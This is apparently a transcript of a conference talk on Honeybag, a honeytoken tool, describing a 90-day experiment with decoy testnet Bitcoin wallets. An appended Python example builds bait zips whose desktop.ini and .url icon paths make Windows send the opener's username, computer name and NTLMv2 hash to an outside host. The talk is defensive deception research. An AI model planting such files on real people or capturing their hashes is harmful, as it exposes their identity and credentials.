Tan Kean Siong, Security Researcher, Independent

Is it possible to easily create a 'tailor-made' deceptive file, let it get stolen on the Internet, and then notify the creator with the 'thief' details? This session will showcase a 90-day real-world use case that did exactly that, spreading '$100,000 worth' of bitcoin wallets on the Internet where all wallets were stolen. Interesting observations, an open source tool, and lessons learned will be shared.
About the talk
Good day, everybody. This is Kean. Thank you very much for listening to my Bitcoin wallet story. Honeypot projects are what I do during my free time: I have been doing some honeypot development and playing around with different deception-based defence mechanisms. Personally, I have always had this big question in my mind: what if you and I just leave something out there for 90 days, or 60 days, and see what happens? That is the concept we are going to explore today: who stole my $100,000 worth of Bitcoin wallets? That is the story of these honey tokens for the next 30 to 35 minutes.

I will share three things here. First, a quick look at the tool, Honeybag. This is a new open-source tool I developed for this purpose only. Then, the $100,000 worth of Bitcoin wallets: how we placed them on the Internet and the exciting moments we had with this use case. Last but not least, I would love to share with everyone here some of the learning experience, some dos and don'ts. Let's do this together, and definitely feel free to ask any questions; I would love to answer them.

Now, all of us already know that a lot of security companies perform Internet-wide scanning in order to look for insecure devices, or vulnerable systems or services on the Internet, and the big brains behind the scenes always think about how we can secure them nicely. But on the other side of the Internet are the bad guys. They are looking at the same so-called Internet scanning results, and those guys harvest those results with malicious intent: for example, looking for an insecure server which contains credit card or personal information, or looking for some internal service which belongs to a certain company. All of this kind of information can be leveraged in order to infiltrate a corporate environment, a private server farm and so on. Bad guys are always looking for juicy information on the Internet.

I always love to use a real-life scenario. Picture a thief who tries to break into a house. He carries an empty bag into the house, puts all the jewellery, all the gold and silver into the bag, and carries the full bag out of the crime scene. Now, what if we place a GPS tracker device in the bag? As the bag moves from one location to another, the GPS tracker sends a ping, a signal, back to the controller, also called the investigator, so we can keep tracking where the bag is going and where the thief is. I would love to try this scenario from the cyber-security defender's point of view: is there anything we can do if we put a bait file into this kind of bag and, whenever the file gets stolen over the Internet, we get information back afterwards? This concept is not brand new. This is about honey tokens, about bait, about breadcrumbs, whichever popular term in the industry you prefer right now; it still comes back to the same fundamental concept, which is a bait.

A real-life example: back in 2017 I came across a very nice public blog post by the guru, Mr. Stevens, on his blog. He observed something very interesting. Some bad guys, in 2017, when the bitcoin price was at an all-time high, around $19,000 per coin, during some Internet scanning activity, tried to pickpocket Bitcoin wallets from his web server, and apparently this came back from time to time over a few months.

One thing that really caught my attention is the picture that he posted on the blog. Personally, I would love to say that this is a very beautiful and very sexy web server log. The bad guy continuously tried his luck by guessing the correct crypto wallet file names, in the hope that there was some crypto wallet located on this web server. The first column is the IP address, the second column is the date and timestamp, followed by the HTTP request and response; here we see a lot of HTTP 404 Not Found responses, followed by the data size and the user agent. Some guy just tried his luck, brute-forcing or guessing different Bitcoin wallet file names, and of course he was hit with a lot of 404 Not Found error codes; there was no Bitcoin wallet over there. What caught our attention the most is the pattern of the brute-forcing activity, the pattern of guessing those crypto wallet file names, which follows common practice. In this case, the guy was looking for a zip file containing the crypto wallet, for example under a backup/ path. Is there anything we can do right here? Can we feed the bad guy with data that contains something in it, so that when this data is accessed by the bad guy, it sends us some information about the bad guy behind the scenes?

With this concept, we would like to introduce you to a new open-source tool, Honeybag. Honeybag is a tool which allows all of us to create a "bag": we can easily put any small files into it, and if someone accesses it, it will notify you and me. We don't need to worry about the bag while it is sitting quietly over there; if someone intentionally accesses it, it will notify us. For the security community, from the cyber-security defence point of view, we hope this can be useful for breach detection and deceptive defence mechanisms.

Let's take a quick look together at how Honeybag works. Honeybag contains three different components, which are pretty easy to use. The first component is the Honeybag command-line client, which you can see on the screen right now. The second component is the Honeybag DNS server, and the third is a Responder setup. These components work with each other and eventually give us a good result. We can easily generate a bait file with any files and folders in it: a sample Excel sheet, PDF, Word document, text file, pictures, or anything. The Honeybag client will generate a zip file, the bait file. Let's take a look at what the zip file looks like. On the right of the screen is a simple tree view of one of the zip files we generated.

In the zip file there is a "secret" folder, and inside it just a single file, a "super secret" document. I know we have a lot of "secret" here. During the process, Honeybag automatically slots two new files into the secret folder: the first file is a URL file, and the second is a file named desktop.ini. This is the alerting mechanism for Honeybag; when someone tries to access the folder, this alerting mechanism kicks in. The first one, desktop.ini, is one of the typical files that every one of us encounters on Windows operating systems. Its legitimate usage is associated with how Windows displays folders and icons; for example, if you want to customise the icon for a folder, you can do it with this file, and Windows will look for the icon file on the local system. Credits to Kingston for a very interesting finding: the desktop.ini mechanism can also look for the icon at an external location, an icon file sitting on a certain domain, or located at some IP address somewhere on the Internet. This kind of trick is really handy for the alerting mechanism. The second file, the URL file, has a similar mechanism: its icon will be looked up at an external location, an IP address sitting somewhere.

So now we have this secret zip file on hand, and we place it somewhere on a computer network or on the Internet. Let's say the file gets stolen. The thief unzips the zip file and clicks into the folder. What happens is that the bag reaches out to two of our components. The first is the DNS server we set up, which can be on a certain IP address on the Internet, with the DNS traffic being logged. From this we start to collect some information, such as the computer name, the username and the domain name of the bad guy's machine which was used to access the bag. From the Responder perspective we get the username and computer name, and if we're lucky, we are able to get the NTLMv2 hash as well. Each of these is a small piece of information here and there, but put all of it together and it forms a very beautiful and very useful investigation picture for us. One caveat: this works for Windows operating systems only. If someone steals the zip file and opens it on Linux, OS X or something else, we will not be able to receive any alert. We are always looking for new ideas, new techniques which we can apply to build a mechanism for Linux and OS X machines, so if you come across any interesting techniques, feel free to reach out to us. We would love to hear about them and hopefully implement them in Honeybag, which is an open-source tool that we hope can be useful for our community, especially from the cyber-security defender's point of view.

Now things are getting interesting; we have the zip file on hand. I would say this thing is not really brand new; similar tools existed before Honeybag. One of our highlights is that this is an open-source tool, and you can easily generate a zip file with any files in it, a single file or three thousand files. Since it is just a command-line script, it can easily be integrated with other scripting languages or automation in your system.

Now we have the tool on hand. The next question is: how do we play with it? Here is what we came up with. What if we place $100,000 worth of Bitcoin wallets on the Internet and just leave them there for 90 days? What will happen to them? Well, once we had this idea, we came across a very huge roadblock: I don't have $100,000 worth of Bitcoin wallets on hand. Be kind to me, thank you very much. Eventually we came across a very interesting alternative, namely Bitcoin testnet (BTC testnet). We could create 10 Bitcoin wallets, unprotected, each containing 1 BTC testnet. Some differences between BTC testnet and BTC: BTC testnet is for testing purposes, used by developers or applications, and it uses the same mechanism in the back end. BTC testnet does not have any real currency value, while BTC is associated with currencies such as the US dollar. Looking at the addresses, BTC testnet and BTC addresses have different prefixes. Testnet coins can be obtained freely from different sources, such as faucets, and the etiquette is that once you have finished using them, you transfer them back to the faucet so that other members of the community can use them later. At that time, 1 testnet BTC was equivalent to around 10 US dollars.

I want to bring up a little bit of human psychology here. In real life, a wallet is a placeholder for valuables such as cash, credit cards or identification cards. What if someone finds one in a restaurant? Will someone take it and try to contact the owner, or will someone just pocket it and take all the cash? So what if we leave 10 Bitcoin wallets on the Internet? What will happen?

We decided to put all ten wallets on multiple open-directory web servers on the Internet, sitting quietly over there, and just wait for things to happen. To make it look real, we also put in a lot of personal files and a bunch of documents. What we really expected was a full screen of very sexy and very beautiful web server logs, and different actors, different bad guys, fighting with each other and each going away with a different copy of our Bitcoin wallets from the web server. Well, reality was so disappointing. It was absolutely, simply quiet for the first 30 or 35 days. From time to time some visitors flew in and said hi, and if we were lucky that was all we got. So the first lesson learned: just be patient. We then rethought our approach and decided to go more proactive: we put up some information such as "This is secret, please don't download." Things got interesting, because people started to download it.

Overall, what happened? Of the ten wallets created with Honeybag, nine of the ten zip files were stolen and sent back some information about the bad guy behind the scenes. One is missing, likely a Linux or macOS environment, so we never received anything back from it. The fastest record for one of the stolen wallets was almost immediate after we posted it on the page; it could be a bot, it could be humans behind it, who knows. We also expected that someone would totally wipe out a wallet. The whole story started around 23 March last year, and in less than 24 hours, surprisingly and unexpectedly, one wallet became totally empty: zero. Somebody just quietly took our BTC testnet. Hey buddy, this is a test, there is no value in it, why did you wipe out our entire wallet?

Let's take a quick look at three different components so we can form a nice timeline investigation. Component one: on 23 March, someone accessed our web server and retrieved the wallet file. In this case, HTTP status 200 indicates success, followed by the user agent, Firefox 70. This happened at 14:40 UTC. Two minutes afterwards, we received this DNS request, a pretty long DNS request, which you see on the screen. This DNS request is in the format we crafted: the first column is the value of the username on the Windows operating system, which reads "Mr. Blue"; the second column is the computer name, in this case a DESKTOP- hostname. So once we got this DNS request, it indicated that the bad guy was on a Windows machine, clicking into the secret folder in Windows Explorer. Now things got interesting, because the lookups continued for 20 minutes: we realised the folks tried to look into the crypto wallet for 20 minutes. Component three is the Responder perspective. We collected the so-called NTLMv2 hash; the username is Mr. Blue, which tallies with what I saw in the DNS log just now, and the computer name appears to be the same as well, which can be useful for investigation later.

Overall, the investigation timeline: around 14:40 UTC the wallet was stolen from the web server; afterwards we received the first DNS request; and 35 minutes from the first moment the file got stolen, Mr. Blue wiped it out. Right now I have no idea why he did this. It could be, I guess, that he found out what we did and was just pissed off about it. I'm just joking. Put all this evidence together and eventually you get the investigation timeline, the picture we wanted: a very beautiful and very sexy web server log, and the folks behind it trying to grab a copy of the Bitcoin wallets.

Lessons learned. We had to wait more than 30 days to get the first result. Patience is always the pain, and the fun, of such cyber-security research: it always takes time, and eventually we get good results. I would suggest customising your own unique deceptive bait; the more unique it is, I believe the better the impact will be. Definitely put up a warning banner or warning message: "Hey buddy, this is a restricted area, restricted resources, you are not authorised to access it." Why would someone try to bypass or totally ignore that kind of warning message? That is where things can get interesting. One last thing I want to mention here is: never underestimate a simple trick for a great impact. Initially I thought this mechanism would be limited, available only for Windows operating systems. Surprisingly, nine out of ten Bitcoin wallets returned information about the bad guy behind them. So never underestimate the great impact of a simple trick; the more unique it is, the more useful it can be.

Please give it a try: try our Honeybag tool, which helps you create a bait zip file. You can easily put any files into a new zip and it will notify you. You can see the GitHub page to download it, and we would also like to welcome anyone who would like to contribute new techniques. That's it for today's session. I would love to thank the organisers for this wonderful opportunity to share, and thanks for listening to my Bitcoin wallet story. Thank you very much.
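The bag-building and alerting mechanism the talk describes (a desktop.ini and a .url file whose icon paths point at a host under a domain you control, so that opening the extracted folder in Explorer causes a DNS lookup and an SMB connection) is illustrated below with an added example. This is not Honeybag's own code, and Honeybag's actual DNS name format is not on the page; the label layout here is this example's own. Assumptions, also flagged in the comments: Explorer expands `%USERNAME%` and `%COMPUTERNAME%` in a desktop.ini `IconResource` path before resolving the UNC host; the DNS query log format is constructed for the example; `bait.example.net` is a hypothetical alert domain.

```python
"""Bait-bag generator and DNS alert parser in the style of the Honeybag
mechanism described above. Added example, not Honeybag's own code.

Assumptions (also flagged inline): Explorer expands %USERNAME% and
%COMPUTERNAME% in a desktop.ini IconResource path before resolving the UNC
host, so the DNS query carries them as labels; the DNS log format is made up
for this example; the alert domain bait.example.net is hypothetical.
"""
import io
import re
import secrets
import zipfile
from typing import Dict, Iterable, List

# DOS attribute bits stored in the low byte of a zip entry's external_attr
DOS_READONLY, DOS_HIDDEN, DOS_SYSTEM, DOS_DIRECTORY = 0x01, 0x02, 0x04, 0x10


def new_token() -> str:
    """Random DNS-safe label that ties one bag to the alert it will raise."""
    return secrets.token_hex(4)  # 8 hex characters, valid as a DNS label


def render_desktop_ini(token: str, alert_domain: str) -> str:
    # Assumption: Explorer expands the %VAR% names, so the queried host name
    # becomes <username>.<computername>.<token>.<alert_domain>.
    host = f"%USERNAME%.%COMPUTERNAME%.{token}.{alert_domain}"
    return f"[.ShellClassInfo]\r\nIconResource=\\\\{host}\\share\\folder.ico,0\r\n"


def render_url_file(token: str, alert_domain: str) -> str:
    # A .url shortcut loads its icon from IconFile; a UNC host here triggers
    # the same DNS lookup (and SMB connection) without relying on expansion.
    return ("[InternetShortcut]\r\nURL=file:///C:/\r\nIconIndex=0\r\n"
            f"IconFile=\\\\{token}.{alert_domain}\\share\\wallet.ico\r\n")


def build_bait_zip(secret_files: Dict[str, bytes], token: str,
                   alert_domain: str, folder: str = "secret") -> bytes:
    """Return a zip holding folder/<secret files> plus the two trigger files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # Folder marked read-only+system so Explorer honours its desktop.ini.
        entries = [(f"{folder}/", b"", DOS_DIRECTORY | DOS_READONLY | DOS_SYSTEM)]
        entries += [(f"{folder}/{n}", d, 0) for n, d in secret_files.items()]
        entries += [
            (f"{folder}/desktop.ini", render_desktop_ini(token, alert_domain).encode(),
             DOS_HIDDEN | DOS_SYSTEM),  # hidden, like a genuine desktop.ini
            (f"{folder}/wallet.url", render_url_file(token, alert_domain).encode(), 0),
        ]
        for name, data, attrs in entries:
            zi = zipfile.ZipInfo(name)
            zi.create_system = 0          # "made on Windows": low byte = DOS attrs
            zi.external_attr = attrs
            zi.compress_type = zipfile.ZIP_STORED if name.endswith("/") else zipfile.ZIP_DEFLATED
            zf.writestr(zi, data)
    return buf.getvalue()


def zip_members(data: bytes) -> Dict[str, bytes]:
    """Read a zip back into {member name: content} for inspection."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {i.filename: zf.read(i) for i in zf.infolist()}


# Constructed DNS query log for this example (not a real capture), one query
# per line: "<timestamp> <client ip> <queried name>".
SAMPLE_DNS_LOG = """\
2020-03-23T14:40:12Z 203.0.113.7 www.example.org.
2020-03-23T14:42:05Z 203.0.113.7 mrblue.desktop-k8x2.9f3a1c2e.bait.example.net.
2020-03-23T14:42:06Z 203.0.113.7 9f3a1c2e.bait.example.net.
2020-03-23T14:55:40Z 198.51.100.9 jane.doe.corp-laptop.ffffffff.bait.example.net.
"""

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<qname>\S+)$")


def parse_dns_alerts(log_text: str, alert_domain: str,
                     known_tokens: Iterable[str]) -> List[dict]:
    """Turn raw DNS queries into alerts: which bag, from where, opened by whom."""
    known = {t.lower() for t in known_tokens}
    suffix = alert_domain.lower().rstrip(".").split(".")
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        labels = m["qname"].lower().rstrip(".").split(".")
        if len(labels) <= len(suffix) or labels[-len(suffix):] != suffix:
            continue  # query not aimed at our alert zone
        head = labels[:-len(suffix)]
        alert = {"ts": m["ts"], "src_ip": m["src"], "token": head[-1],
                 "known": head[-1] in known,  # unknown token = someone probing the zone
                 "username": None, "computername": None}
        if len(head) >= 3:  # desktop.ini path: <username>.<computername>.<token>
            alert["computername"] = head[-2]
            alert["username"] = ".".join(head[:-2])  # usernames may contain dots
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    token = new_token()
    bag = build_bait_zip({"wallet.dat": b"decoy, not a real wallet"}, token, "bait.example.net")
    print(sorted(zip_members(bag)))
    for a in parse_dns_alerts(SAMPLE_DNS_LOG, "bait.example.net", ["9f3a1c2e"]):
        print(a)
```

The `.url` trigger carries only the token, so it tells you which bag was opened and from which IP; the desktop.ini trigger adds the username and computer name, which is the extra information the talk correlates with the Responder capture. Two practical caveats: Explorer only applies a folder's desktop.ini when the folder carries the read-only or system attribute, and whether a given extractor restores the DOS attributes stored in the zip varies, so verify the trigger on the Windows versions you care about; and the SMB side (the NTLMv2 capture) is Responder's job and is not shown here.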